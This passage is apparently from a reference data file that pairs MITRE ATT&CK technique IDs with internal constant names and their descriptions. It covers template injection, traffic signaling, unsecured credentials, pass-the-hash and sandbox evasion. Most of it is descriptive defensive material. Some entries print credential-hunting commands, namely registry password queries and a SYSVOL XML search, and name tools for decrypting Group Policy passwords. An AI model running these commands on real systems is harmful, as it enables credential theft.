Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft's Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, .xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives comprised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017) Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded. Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017) This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting an SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)
https://attack.mitre.org/techniques/T1221
T1205 XDM_CONST.MITRE_TECHNIQUE_TRAFFIC_SIGNALING
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered-off systems. Wake-on-LAN is a hardware feature that allows a powered-down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet)
https://attack.mitre.org/techniques/T1205
T1205.001 XDM_CONST.MITRE_TECHNIQUE_TRAFFIC_SIGNALING_PORT_KNOCKING
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host-based firewall, but could also be implemented by custom software. This technique has been observed both for the dynamic opening of a listening port and for initiating a connection to a listening server on a different system. The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
https://attack.mitre.org/techniques/T1205/001
T1537 XDM_CONST.MITRE_TECHNIQUE_TRANSFER_DATA_TO_CLOUD_ACCOUNT
Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection. A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces. Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)
https://attack.mitre.org/techniques/T1537
T1127 XDM_CONST.MITRE_TECHNIQUE_TRUSTED_DEVELOPER_UTILITIES_PROXY_EXECUTION
Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.
https://attack.mitre.org/techniques/T1127
T1127.001 XDM_CONST.MITRE_TECHNIQUE_TRUSTED_DEVELOPER_UTILITIES_PROXY_EXECUTION_MSBUILD
Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild) Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
https://attack.mitre.org/techniques/T1127/001
T1199 XDM_CONST.MITRE_TECHNIQUE_TRUSTED_RELATIONSHIP
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through a trusted third-party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. Organizations often grant elevated access to second- or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)
https://attack.mitre.org/techniques/T1199
T1111 XDM_CONST.MITRE_TECHNIQUE_TWO_FACTOR_AUTHENTICATION_INTERCEPTION
Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two- or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily the focus of cyber criminals, these authentication mechanisms have also been targeted by advanced actors. (Citation: Operation Emmental)
https://attack.mitre.org/techniques/T1111
T1552 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS
Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).
https://attack.mitre.org/techniques/T1552
T1552.003 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_BASH_HISTORY
Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user's .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user's last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)
https://attack.mitre.org/techniques/T1552/003
T1552.005 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_CLOUD_INSTANCE_METADATA_API
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019) If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018) The de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.
https://attack.mitre.org/techniques/T1552/005
T1552.007 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_CONTAINER_API
Adversaries may gather credentials via APIs within a container environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API) An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components.
https://attack.mitre.org/techniques/T1552/007
T1552.001 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_CREDENTIALS_IN_FILES
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP) In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)
https://attack.mitre.org/techniques/T1552/001
T1552.002 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_CREDENTIALS_IN_REGISTRY
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons. Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)
* Local Machine Hive: reg query HKLM /f password /t REG_SZ /s
* Current User Hive: reg query HKCU /f password /t REG_SZ /s
https://attack.mitre.org/techniques/T1552/002
T1552.006 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_GROUP_POLICY_PREFERENCES
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016) These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key) The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
* Metasploit's post exploitation module: post/windows/gather/credentials/gpp
* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: dir /s * .xml
https://attack.mitre.org/techniques/T1552/006
T1552.004 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_PRIVATE_KEYS
Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk, .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on *nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia) Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.
https://attack.mitre.org/techniques/T1552/004
T1535 XDM_CONST.MITRE_TECHNIQUE_UNSUPPORTED_CLOUD_REGIONS
Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure. Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected. A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity. An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)
https://attack.mitre.org/techniques/T1535
T1550 XDM_CONST.MITRE_TECHNIQUE_USE_ALTERNATE_AUTHENTICATION_MATERIAL
Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA) Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication material must be maintained by the system, either in memory or on disk, it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.
https://attack.mitre.org/techniques/T1550
T1550.001 XDM_CONST.MITRE_TECHNIQUE_USE_ALTERNATE_AUTHENTICATION_MATERIAL_APPLICATION_ACCESS_TOKEN
Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim's primary email, the adversary may be able to extend access to all other services to which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.
https://attack.mitre.org/techniques/T1550/001
T1550.002 XDM_CONST.MITRE_TECHNIQUE_USE_ALTERNATE_AUTHENTICATION_MATERIAL_PASS_THE_HASH
Adversaries may "pass the hash" using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)
https://attack.mitre.org/techniques/T1550/002
T1550.003 XDM_CONST.MITRE_TECHNIQUE_USE_ALTERNATE_AUTHENTICATION_MATERIAL_PASS_THE_TICKET
Adversaries may "pass the ticket" using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. When performing PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the NTLM hash of the Key Distribution Service account (KRBTGT), which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014) Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using an NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)
https://attack.mitre.org/techniques/T1550/003
T1550.004 XDM_CONST.MITRE_TECHNIQUE_USE_ALTERNATE_AUTHENTICATION_MATERIAL_WEB_SESSION_COOKIE
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated. (Citation: Pass The Cookie) Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform. There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)
https://attack.mitre.org/techniques/T1550/004
T1204 XDM_CONST.MITRE_TECHNIQUE_USER_EXECUTION
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access, it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
https://attack.mitre.org/techniques/T1204
T1204.002 XDM_CONST.MITRE_TECHNIQUE_USER_EXECUTION_MALICIOUS_FILE
An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it. While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access, it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
https://attack.mitre.org/techniques/T1204/002
T1204.003 XDM_CONST.MITRE_TECHNIQUE_USER_EXECUTION_MALICIOUS_IMAGE Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services
(AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well
as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to
a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may
then download and deploy an instance or container from the image without realizing the image is malicious,
thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of
malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation:
Summit Route Malicious AMIs) Adversaries may also name images a certain way to increase the chance of
users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or
Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat
Report June 2021) https://attack.mitre.org/techniques/T1204/003
T1204.001 XDM_CONST.MITRE_TECHNIQUE_USER_EXECUTION_MALICIOUS_LINK An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be
subjected to social engineering to get them to click on a link that will lead to code execution. This user
action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/
techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation
of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/
techniques/T1203). Links may also lead users to download files that require execution via [Malicious File]
(https://attack.mitre.org/techniques/T1204/002). https://attack.mitre.org/techniques/T1204/001
T1078 XDM_CONST.MITRE_TECHNIQUE_VALID_ACCOUNTS Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access,
Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass
access controls placed on various resources on systems within the network and may even be used for
persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access
and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific
systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools
in conjunction with the legitimate access those credentials provide to make it harder to detect their
presence. The overlap of permissions for local, domain, and cloud accounts across a network of systems is
of concern because the adversary may be able to pivot across accounts and systems to reach a high level
of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.
(Citation: TechNet Credential Theft) https://attack.mitre.org/techniques/T1078
T1078.004 XDM_CONST.MITRE_TECHNIQUE_VALID_ACCOUNTS_CLOUD_ACCOUNTS Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access,
Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by
an organization for use by users, remote support, services, or for administration of resources within a cloud
service provider or SaaS application. In some cases, cloud accounts may be federated with traditional
identity management systems, such as Windows Active Directory. (Citation: AWS Identity Federation)
(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials
for cloud accounts can be used to harvest sensitive data from online storage accounts and databases.
Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted
Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://
attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to
more easily move laterally within an environment. https://attack.mitre.org/techniques/T1078/004
T1078.001 XDM_CONST.MITRE_TECHNIQUE_VALID_ACCOUNTS_DEFAULT_ACCOUNTS Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access,
Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS,
such as the Guest or Administrator accounts on Windows systems. Default accounts also include default
factory/provider set accounts on other types of systems, software, or devices, including the root user
account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb
2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) Default accounts are not limited to
client machines, rather also include accounts that are preset for equipment such as network devices and
computer applications whether they are internal, open source, or commercial. Appliances that come preset
with a username and password combination pose a serious threat to organizations that do not change it
post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly
disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to
legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/
T1021).(Citation: Metasploit SSH Module) https://attack.mitre.org/techniques/T1078/001
T1078.002 XDM_CONST.MITRE_TECHNIQUE_VALID_ACCOUNTS_DOMAIN_ACCOUNTS Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access,
Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain
accounts are those managed by Active Directory Domain Services where access and permissions are
configured across systems and services that are part of that domain. Domain accounts can cover users,
administrators, and services.(Citation: Microsoft AD Accounts) Adversaries may compromise domain
accounts, some with a high level of privileges, through various means such as [OS Credential Dumping]
(https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of
the domain. https://attack.mitre.org/techniques/T1078/002
T1078.003 XDM_CONST.MITRE_TECHNIQUE_VALID_ACCOUNTS_LOCAL_ACCOUNTS Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access,
Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an
organization for use by users, remote support, services, or for administration on a single system or service.
Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential
Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local
accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral
Movement. https://attack.mitre.org/techniques/T1078/003
T1125 XDM_CONST.MITRE_TECHNIQUE_VIDEO_CAPTURE An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or
applications (e.g., video call services) to capture video recordings for the purpose of gathering information.
Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video
files. Malware or scripts may be used to interact with the devices through an available API provided by the
operating system or an application to capture video or images. Video or image files may be written to disk
and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113)
due to use of specific devices or applications for video recording rather than capturing the victim's screen.
In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and
Proton. (Citation: objective-see 2017 review) https://attack.mitre.org/techniques/T1125
T1497 XDM_CONST.MITRE_TECHNIQUE_SANDBOX_EVASION Adversaries may employ various means to detect and avoid virtualization and analysis environments. This
may include changing behaviors based on the results of checks for the presence of artifacts indicative of a
virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their
malware to disengage from the victim or conceal the core functions of the implant. They may also search
for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information
learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated
discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness) Adversaries may use
several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts
associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help
determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within
malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015) https://
attack.mitre.org/techniques/T1497
T1497.001 XDM_CONST.MITRE_TECHNIQUE_SANDBOX_EVASION_SYSTEM_CHECKS Adversaries may employ various system checks to detect and avoid virtualization and analysis
environments. This may include changing behaviors based on the results of checks for the presence of
artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME,
they may alter their malware to disengage from the victim or conceal the core functions of the implant. They
may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use
the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Specific checks will vary based on the target and/or adversary, but may involve behaviors such as
[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://
attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/
T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and
search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system,
hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and
then have the program exit if it determines the system to be a virtual environment. Checks could include
generic system properties such as host/domain name and samples of network traffic. Adversaries may also
check the network adapters addresses, CPU core count, and available memory/drive size. Other common
checks may enumerate services running that are unique to these applications, installed programs on the
system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific
hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare,
